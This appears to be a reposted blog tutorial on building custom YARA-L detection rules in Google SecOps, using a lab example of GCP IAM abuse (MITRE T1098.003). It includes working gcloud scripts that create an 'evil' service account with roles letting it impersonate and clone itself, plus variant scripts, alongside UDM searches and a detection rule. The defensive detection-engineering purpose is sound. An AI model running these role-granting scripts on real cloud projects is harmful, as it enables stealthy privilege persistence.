
Are you looking for a guide on how to ideate new YARA-L rules? If you are a SOC analyst using Google SecOps, this guide will help you unlock the ideation process for new rules. While we will not delve into YARA-L syntax or rule coding recommendations, we will focus on essential aspects such as attack path discovery, UDM search, and testing.
Google SecOps offers numerous pre-configured rules with valuable detection capabilities. However, there are potential gaps in coverage that need to be addressed to safeguard our environment effectively. Our unique security requirements may necessitate the creation of custom YARA-L rules to enhance our defenses and address specific threats.
To identify security gaps not addressed by Google SecOps, multiple approaches can be employed. Here, we will concentrate on the clear-box (white-box) penetration testing approach.
The gap identification process looks like this:
- Explore the existing detection rules
- Identify exploitable attack paths not covered by the existing rules
- Create an exploit
- Verify that SecOps does not detect the exploit
Through this ongoing, proactive approach, we actively seek out emerging vulnerabilities and respond by developing new exploits and detection rules. The introduction of new tools opens up new attack vectors, demanding vigilance and a flexible response.
To identify new vectors effectively, we will concentrate on a specific type of vulnerability known as IAM Abuse vulnerabilities. We need to meticulously review all the accessible rules in Google SecOps for this particular vector and identify attacks that are not covered by the curated ruleset.
Some recommendations for vulnerability identification:
- Narrow your scope to a specific vulnerability kind.
- Review all the available rules for your selected vulnerability.
- Research online, leverage the MITRE ATT&CK® framework.
To provide a concrete example, let’s create a new exploit script based on Account Manipulation: Additional Cloud Roles (Sub-technique T1098.003 — Enterprise | MITRE ATT&CK®). This attack vector was identified at the time of writing after a careful analysis of the IAM Abuse detection rules included in Google SecOps, compared against the MITRE ATT&CK® framework.
To create an exploit for this technique, we need a script that performs these steps:
- Create a new Service Account
- Grant overly permissive roles to the SA
- Impersonate the SA to create clones
Let’s create an exploit for this vector:
project_id=lucasnogueira-lab-1
evil_user=lucasnogueira@cloudexample.net

gcloud config set project $project_id

gcloud services enable serviceusage.googleapis.com
gcloud services enable iam.googleapis.com
gcloud services enable cloudresourcemanager.googleapis.com

gcloud projects add-iam-policy-binding $project_id \
  --member=user:$evil_user \
  --role='roles/iam.serviceAccountTokenCreator'

gcloud iam service-accounts create evil-service-account \
  --description="Evil SA for testing" \
  --display-name="Evil SA"

roles=(
  'roles/resourcemanager.projectIamAdmin'
  'roles/iam.serviceAccountUser'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountTokenCreator'
  'roles/iam.serviceAccountAdmin'
)

for role in "${roles[@]}"; do
  gcloud projects add-iam-policy-binding $project_id \
    --member=serviceAccount:evil-service-account@$project_id.iam.gserviceaccount.com \
    --role=$role
done
The current configuration grants the service account excessive permissions, allowing it to create new service accounts with similar extensive permissions and generate service account (SA) keys to impersonate the SAs. This clearly seems like an attempt to manipulate the Identity and Access Management (IAM) system, as the SA is not an owner but can still create service accounts for specific actions and impersonate them.
Once you have the exploit ready, execute it in a Cloud Shell. If the exploit was successful, it should not have triggered any alerts or detections.
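Before moving on, it can help to confirm that the bindings actually landed. One way to do that (this snippet is our own addition, and it assumes an authenticated gcloud session against the same lab project) is to flatten the project’s IAM policy and filter on the suspect account:

```shell
# Sketch: list every role currently bound to the suspect service account.
# Assumes gcloud is authenticated and the lab project exists.
project_id=lucasnogueira-lab-1
sa_member="serviceAccount:evil-service-account@${project_id}.iam.gserviceaccount.com"

gcloud projects get-iam-policy "$project_id" \
  --flatten="bindings[].members" \
  --filter="bindings.members:${sa_member}" \
  --format="table(bindings.role)"
```

If the exploit ran correctly, the table should list all five roles from the script above.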
An extension of the previous exploit shows how it can be leveraged by bad actors:
project_id=lucasnogueira-lab-1

gcloud iam service-accounts create new-evil-service-account \
  --description="New Evil SA for testing" \
  --display-name="New Evil SA" \
  --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com

roles=(
  'roles/resourcemanager.projectIamAdmin'
  'roles/iam.serviceAccountUser'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountTokenCreator'
  'roles/iam.serviceAccountAdmin'
)

for role in "${roles[@]}"; do
  gcloud projects add-iam-policy-binding $project_id \
    --member=serviceAccount:new-evil-service-account@$project_id.iam.gserviceaccount.com \
    --role=$role \
    --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
We have successfully discovered an exploit that goes undetected, which lets us move forward with evaluating the security events it generates.
At this stage, we use UDM search to determine which security events we can build the detection rule on.
To identify events involving the malicious service account, we can run the following query in the UDM search field:
target.user.email_addresses = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
OR principal.user.userid = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
By running this query we have found the following events:
USER_RESOURCE_UPDATE_PERMISSIONS
USER_RESOURCE_CREATION
USER_RESOURCE_UPDATE_CONTENT
The output is promising, so we can deep-dive into the event USER_RESOURCE_UPDATE_PERMISSIONS.
The following UDM search will output all the events where roles/iam.serviceAccountKeyAdmin is granted for the service account.
metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS" AND security_result.action = "ALLOW" AND
principal.user.attribute.roles[0].name = "roles/iam.serviceAccountKeyAdmin" AND
(target.user.email_addresses = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
OR principal.user.userid = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com")
We don’t want to get too many false positives, so we want to focus on the permissions that might allow the service account to replicate itself via impersonation.
This implies that the account will be granted, at a minimum, the following roles:
- roles/resourcemanager.projectIamAdmin
- roles/iam.serviceAccountUser
- roles/iam.serviceAccountKeyAdmin
- roles/iam.serviceAccountTokenCreator
- roles/iam.serviceAccountAdmin
Individually, these fine-grained roles are not immediately suspicious, but together they enable attackers to gain persistence in a system.
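To make the reasoning concrete: the grant only matters for persistence once the bound roles cover the whole replication set. A minimal bash sketch of that set-containment check (the `can_replicate` helper is our own illustration, not part of SecOps; the role names come from the list above):

```shell
# Replication set: roles that, together, let a SA clone itself.
required=(
  'roles/resourcemanager.projectIamAdmin'
  'roles/iam.serviceAccountUser'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountTokenCreator'
  'roles/iam.serviceAccountAdmin'
)

# can_replicate ROLE...  -> exit 0 only if every required role was granted.
can_replicate() {
  local req granted found
  for req in "${required[@]}"; do
    found=0
    for granted in "$@"; do
      [[ "$granted" == "$req" ]] && found=1
    done
    (( found )) || return 1
  done
  return 0
}

# A grant missing serviceAccountAdmin cannot fully self-replicate:
can_replicate 'roles/iam.serviceAccountUser' 'roles/iam.serviceAccountKeyAdmin' \
  && echo "replication possible" || echo "incomplete grant"   # → incomplete grant
```

This is also why the rule below matches on any of the five roles and then counts events per service account, rather than demanding a single event that carries them all.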
Having recognized the fields that pinpoint the security event, we can move forward with the rule development process.
Okay, so based on what we’ve learned, we can start putting our rule together. I’ve already built a rule that checks all the facts identified in the events. Instead of getting into all the technical details here, I suggest checking out dedicated YARA-L resources for a more in-depth explanation.
Let’s review the information we compiled in Step 3:
- The event_type is USER_RESOURCE_UPDATE_PERMISSIONS
- The security_result.action is ALLOW
- The target is a service account
- The roles added to the target are in this list:
  - roles/resourcemanager.projectIamAdmin
  - roles/iam.serviceAccountUser
  - roles/iam.serviceAccountKeyAdmin
  - roles/iam.serviceAccountTokenCreator
  - roles/iam.serviceAccountAdmin
This information produces a unique fingerprint of the exploit, which can be used to identify the attack vector. We can now create a rule that includes all these data points together.
rule lucas_test_sa_iam_abuse {
  meta:
    author = "lucasnogueira"
    description = "Detects when a SA is granted excessive granular permissions."
    mitre_attack_tactic = "Persistence"
    mitre_attack_technique = "Account Manipulation"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1098/"
    type = "Alert"
    data_source = "GCP Audit Logs"
    platform = "GCP"
    severity = "High"
    priority = "High"

  events:
    $e.target.user.email_addresses = $sa
    re.regex($e.target.user.email_addresses, `.*iam\.gserviceaccount\.com$`)
    $e.metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS"
    $e.security_result.action = "ALLOW"
    (
      $e.target.user.attribute.roles.name = "roles/resourcemanager.projectIamAdmin" or
      $e.target.user.attribute.roles.name = "roles/iam.serviceAccountKeyAdmin" or
      $e.target.user.attribute.roles.name = "roles/iam.serviceAccountUser" or
      $e.target.user.attribute.roles.name = "roles/iam.serviceAccountTokenCreator" or
      $e.target.user.attribute.roles.name = "roles/iam.serviceAccountAdmin"
    )

  match:
    $sa over 1h

  outcome:
    $risk_score = max(50)
    $mitre_attack_tactic = "Persistence"
    $mitre_attack_technique = "Account Manipulation"
    $mitre_attack_technique_id = "T1098"

  condition:
    #e >= 3
}
To evaluate the rule during its creation, we utilized the rules editor in Google SecOps. As observed in the attached screenshot, the rule effectively detected the exploit we had generated, confirming its functionality.
Although this rule is not flawless, its assistance with detection is a positive step forward. In the next section, we will refine the rule to enhance its effectiveness.
With the exploit and the rule in hand, we can construct a test to evaluate its efficacy. While backtesting on the platform can aid in development, our objective is to conduct live testing to assess the rule’s performance in real-time conditions.
First, we must enable the rule so it can start live detection. To enable the rule, go to the RULES DASHBOARD, search for your rule, then open the three-dot menu and enable it as a live rule.
Once the rule is enabled we can proceed to test it in live mode.
During testing, we will alter the exploit, crafting variants that resemble the original but differ in some details.
project_id=lucasnogueira-lab-1

gcloud config set project $project_id

gcloud iam service-accounts create not-evil-1 \
  --description="Not Evil at All SA for testing" \
  --display-name="Not Evil at All SA" \
  --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com

gcloud iam service-accounts create not-evil-2 \
  --description="Not Evil at All SA for testing" \
  --display-name="Not Evil at All SA" \
  --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com

gcloud iam service-accounts create not-evil-3 \
  --description="Not Evil at All SA for testing" \
  --display-name="Not Evil at All SA" \
  --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com

roles=(
  'roles/resourcemanager.projectIamAdmin'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountTokenCreator'
)
for role in "${roles[@]}"; do
  gcloud projects add-iam-policy-binding $project_id \
    --member=serviceAccount:not-evil-1@$project_id.iam.gserviceaccount.com \
    --role=$role \
    --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done

roles=(
  'roles/resourcemanager.projectIamAdmin'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountUser'
)
for role in "${roles[@]}"; do
  gcloud projects add-iam-policy-binding $project_id \
    --member=serviceAccount:not-evil-2@$project_id.iam.gserviceaccount.com \
    --role=$role \
    --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done

roles=(
  'roles/iam.serviceAccountTokenCreator'
  'roles/iam.serviceAccountKeyAdmin'
  'roles/iam.serviceAccountUser'
)
for role in "${roles[@]}"; do
  gcloud projects add-iam-policy-binding $project_id \
    --member=serviceAccount:not-evil-3@$project_id.iam.gserviceaccount.com \
    --role=$role \
    --impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
This script creates three imitations of the malicious service account we’re investigating. Our goal is to see whether the rule can identify suspicious activity even when the specifics (the fingerprint) differ slightly. By introducing these variations, we test the rule’s flexibility and ensure it detects the unwanted behavior despite minor discrepancies.
Let’s put it to the test to see if Google SecOps picks up on these events.
It works! We have been able to detect the exploit even when it has been changed.
In this guide we attempted to show what the ideation process for creating new detection rules looks like. This was just one example of an attack path we found that wasn’t really being monitored.
There are always going to be blind spots, and we must keep hunting for them. I hope this guide helps you learn the process of rule creation, so you can build a more secure and robust environment.
Source Credit: https://medium.com/google-cloud/guide-ideating-custom-yara-l-detection-rules-in-google-secops-c15e2645a61a